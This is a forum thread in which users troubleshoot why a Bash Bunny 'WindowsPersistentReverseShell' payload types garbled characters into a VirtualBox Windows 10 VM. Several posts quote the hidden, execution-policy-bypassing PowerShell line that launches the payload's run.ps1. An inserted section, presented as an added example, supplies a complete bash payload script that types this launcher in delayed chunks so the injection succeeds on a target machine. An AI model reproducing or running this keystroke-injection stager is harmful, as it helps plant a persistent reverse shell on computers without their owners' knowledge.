heartbleed, posted May 25, 2020

Hello all,

I am having some trouble with my Bash Bunny on a Windows 10 VirtualBox VM. When I use a WindowsPersistentReverseShell payload, the output on run.exe is not right:

LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

The output should be:

Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1')

But this is how it appears on my Windows 10 VM:

Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!")

I'm using VirtualBox 6.1.8 r137981 (Qt5.6.2), the USB 3.0 driver, Windows 10 and Bash Bunny US language. When I test this payload on my Windows 10 machine (not a VM) everything goes perfectly. I also read in some old forums about slowing down keystrokes in Rubber Ducky STRINGs because of VM buffer issues: I think this is the problem, but the String_Delay that solves the problem on the Rubber Ducky doesn't work on the Bash Bunny, or I am not using it correctly. Does anybody know how to solve this issue?
Bob123, posted May 25, 2020

The string you have above is quite large to pick apart character by character. I do see several that are missing or capitalized. Is this the real output you get from your VM, or are there a few mistakes from when this was typed in? It's hard to troubleshoot when I'm not sure what's at fault here. Not faulting you, I just want to make sure I know for sure that what you have above is the exact output and not a typing issue. I mean, is your output really LABE and NAM???

You could use the Q DELAY or QUACK DELAY command to delay an entire line or even parts of a line if you are somehow missing characters every now and then. I'd put a QUACK DELAY 1000 right above this line and see if it helps at all. Or put one midway through and see if that helps a bit. I'll see if I can get the same result on mine.
Bob123, posted May 26, 2020

Well, I have a Win10 VM in VMware and got it all to work without issue. I'll try VirtualBox, but it might take a bit longer since I'll have to make the VMs for it.
heartbleed (Author), posted May 26, 2020

On 5/25/2020 at 8:22 PM, Bob123 said:
The string you have above is quite large to pick apart character by character. I do see several that are missing or capitalized. Is this the real output you get from your VM, or are there a few mistakes from when this was typed in? It's hard to troubleshoot when I'm not sure what's at fault here. Not faulting you, I just want to make sure I know for sure that what you have above is the exact output and not a typing issue. I mean, is your output really LABE and NAM??? You could use the Q DELAY or QUACK DELAY command to delay an entire line or even parts of a line if you are somehow missing characters every now and then. I'd put a QUACK DELAY 1000 right above this line and see if it helps at all. Or put one midway through and see if that helps a bit. I'll see if I can get the same result on mine.

Yes, this is the real output, and it changes somehow every time I use my Bash Bunny again, like the photo. You can see that the word "NAME" was NAM before, and now is "AME". I started to break the string into pieces, to see if the end of the string would become 100% OK. Look:

Command on PC:
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"

Output 100% OK:
Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1')

Now on the VM you will see that the output gets better each time I reduce the string (the green part is OK, red is wrong. The commands are broken, but I made this just to test the output).
Command:
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
Output:
Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!")

Command:
RUN WIN Powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
Output:
Powershell .((gwmi win32_volume -f 'label=''BASHBNNY""")NME+"PAYLOADS|SWITCH!|RUN>PS!")

Command:
RUN WIN Powershell ".(('label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
Output:
Powershell .(('label=''BashBunny''').NME+PAYLOAS|SWITCH!|RUN>PS!")

So as you can see, the smaller the string is, the better it reaches the end, but still with output errors, and a kind of random error, as shown in the picture. I am very convinced that this is a VM buffer problem. I've tried QUACK DELAY before the command, no progress... I think the real solution would be something like the String_Delay shown in the old topic in my first post, but I need something like it for the Bash Bunny.
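A chunked-typing workaround in the spirit of the QUACK DELAY suggestion above and the STRING_DELAY-style slowdown asked for in this post. This is an added example written for this thread, not code from the original posts or from Hak5's payload library. It assumes the Bash Bunny's Q, LED and ATTACKMODE helpers and the Ducky keywords STRING, SPACE, DELAY, GUI and ENTER; the 16-character chunk size and the 150 ms pause are assumptions to tune, and the fallback definitions of Q, LED and ATTACKMODE exist only so the script can be dry-run on an ordinary shell, where it prints the Ducky lines it would have sent.

```shell
#!/bin/bash
# payload.txt: type a long command in short chunks with a pause after each,
# standing in for the Rubber Ducky STRING_DELAY that QUACK does not offer.
# Added example for this thread; not Hak5 code.

# Dry-run fallbacks (assumption): on a real Bash Bunny these helpers already
# exist and the definitions below are skipped. Off the device they only print
# the Ducky lines so the chunking can be inspected on a normal PC.
command -v Q          >/dev/null 2>&1 || Q()          { printf 'Q %s\n' "$*"; }
command -v LED        >/dev/null 2>&1 || LED()        { printf 'LED %s\n' "$*"; }
command -v ATTACKMODE >/dev/null 2>&1 || ATTACKMODE() { printf 'ATTACKMODE %s\n' "$*"; }
: "${SWITCH_POSITION:=switch1}"   # set by the Bunny firmware; default for dry runs

# type_slowly TEXT CHUNK_SIZE DELAY_MS
# Sends TEXT as Q STRING pieces of at most CHUNK_SIZE characters, with a
# Q DELAY after every piece. Spaces that land on a chunk boundary are sent as
# Q SPACE keystrokes so no STRING argument starts or ends with whitespace
# (assumption: QUACK may trim it). Spaces inside a chunk pass through as-is.
type_slowly() {
  s=$1; n=$2; d=$3
  while [ -n "$s" ]; do
    chunk=$(printf '%s' "$s" | cut -c1-"$n")
    s=$(printf '%s' "$s" | cut -c"$((n + 1))"-)
    # trailing spaces of this chunk -> SPACE keystrokes
    trail=${chunk##*[! ]}        # trailing run of spaces (whole chunk if all spaces)
    body=${chunk%"$trail"}
    [ -n "$body" ] && Q STRING "$body"
    i=${#trail}
    while [ "$i" -gt 0 ]; do Q SPACE; i=$((i - 1)); done
    # leading spaces of the remainder -> SPACE keystrokes
    lead=${s%%[! ]*}
    s=${s#"$lead"}
    i=${#lead}
    while [ "$i" -gt 0 ]; do Q SPACE; i=$((i - 1)); done
    Q DELAY "$d"
  done
}

# The exact text the thread's RUN WIN line types (bash expands \\ and
# $SWITCH_POSITION here, as it does inside RUN WIN's double quotes).
CMD="Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"

LED ATTACK
ATTACKMODE HID STORAGE   # STORAGE so the BashBunny volume exists for gwmi
Q GUI r                  # open the Run dialog, as RUN WIN does
Q DELAY 500
type_slowly "$CMD" 16 150
Q ENTER
LED FINISH
```

Drop this in as the typing step of the payload in place of the single RUN WIN line (the rest of WindowsPersistentReverseShell is untouched) and run `sh payload.txt` on a PC first to see the Q lines it will emit. If the VM still drops characters, lower the chunk size or raise the delay; if it types cleanly, that supports the keystroke-rate theory, but it does not by itself say whether VirtualBox's USB passthrough is at fault.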
Bob123, posted May 27, 2020

That is so weird. Well, I set everything up on my laptop and I need to see how to make USB work better (or even work to begin with) in VirtualBox. Works like a champ in VMware. I may have to resort to my desktop, so I'll let you know if I have any luck. But with VMware I had zero issues. As far as length, I didn't have to modify the payload; however, I noticed that sometimes the switch tag doesn't always work, so I just hard-coded it.
heartbleed (Author), posted May 27, 2020

I will try with VMware. For VirtualBox you have to download a Windows 10 developer VM, and after that download VirtualBox and the VirtualBox Extension Pack to enable USB 3.0, and that's it! If you can do it, I will try VMware and we can both double-check this problem.
heartbleed (Author), posted May 27, 2020

Bob, I tested with VMware and it really works! Conclusion: there's something wrong with the VirtualBox USB driver; VMware works 100%! Thank you, I wouldn't have tried VMware without your support! If you reach the same conclusion about VirtualBox, please tell me, so I will know whether the problem happens only to me.
Bob123, posted May 27, 2020

OblivionX, thanks for your kind words. It's nice to know that I can help out every now and then. And thanks for the reminder on the Extension Pack. I had a n00b moment... comes with old age!

OK, so VirtualBox at the same level as yours, Extension Pack the same as yours. The only difference is my laptop is older, so I'm only using USB 2.0. I downloaded MS's Edge Win10 VM and made my own Win10 VM, and both worked fine. You mentioned the Win10 developer VM, which I think is that 20-ish GB VM. I'm downloading that now and will give it a go. Depending on the results of that, maybe try the USB 2.0 option rather than 3.0? I'll let you know what I find. I think I may still try all this on my desktop since it has USB 3.0. 'Cause I really want to see it screw up! Actually, I'll see what happens if I try the USB 3.0 options on my laptop and see if that makes a difference. Thanks.
heartbleed (Author), posted May 27, 2020

Bob123, you really helped me! I spent some time finding out that I would have to use the Extension Pack too, so I had a n00b moment too =). I tried USB 2.0 with no success... Maybe my RAM/processor speed is somehow too fast for the Bunny? I am using NVMe too, so idk if this can change something for the VM speed... If you have success with the same VM (20 GB) and 3.0, the problem is not the VirtualBox driver; it will be something else that I don't know...
Bob123, posted May 27, 2020

Welp, I couldn't replicate the issue. I downloaded the dev Win10 VM, set it to USB 3, plugged in the Bunny and the payload worked. My laptop is older, though. It's a second-gen i5, but it's hanging in there. I'll try it on my desktop, which actually has USB 3 ports on it, and I'll see what that one does. I wouldn't think it'd be CPU, RAM, or HD. Maybe a motherboard driver?
Bob123, posted May 28, 2020

I did the same tests on my desktop today with USB 3 only, and everything seemed to work fine. Guessing a driver issue, or maybe it is some sort of hardware issue. Let me know if you end up trying anything else.
heartbleed (Author), posted May 28, 2020

Hi Bob! It seems that this is a hardware issue... I didn't try anything else; I think we tried everything about this, but the good thing is that my VMware VM works! Thanks again for the support, and now we can close this topic! 😄
FiLa, posted March 5, 2022

Hello, I have the same issue. My output in Win10 is:

Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f `label=``BashBunny```).Name+`payloadsswitch2run.ps1`)

I have CZ language.
dark_pyrro, posted March 5, 2022

Are you using cz as DUCKY_LANG? Are the backticks intentional? Those chars should be single quotes.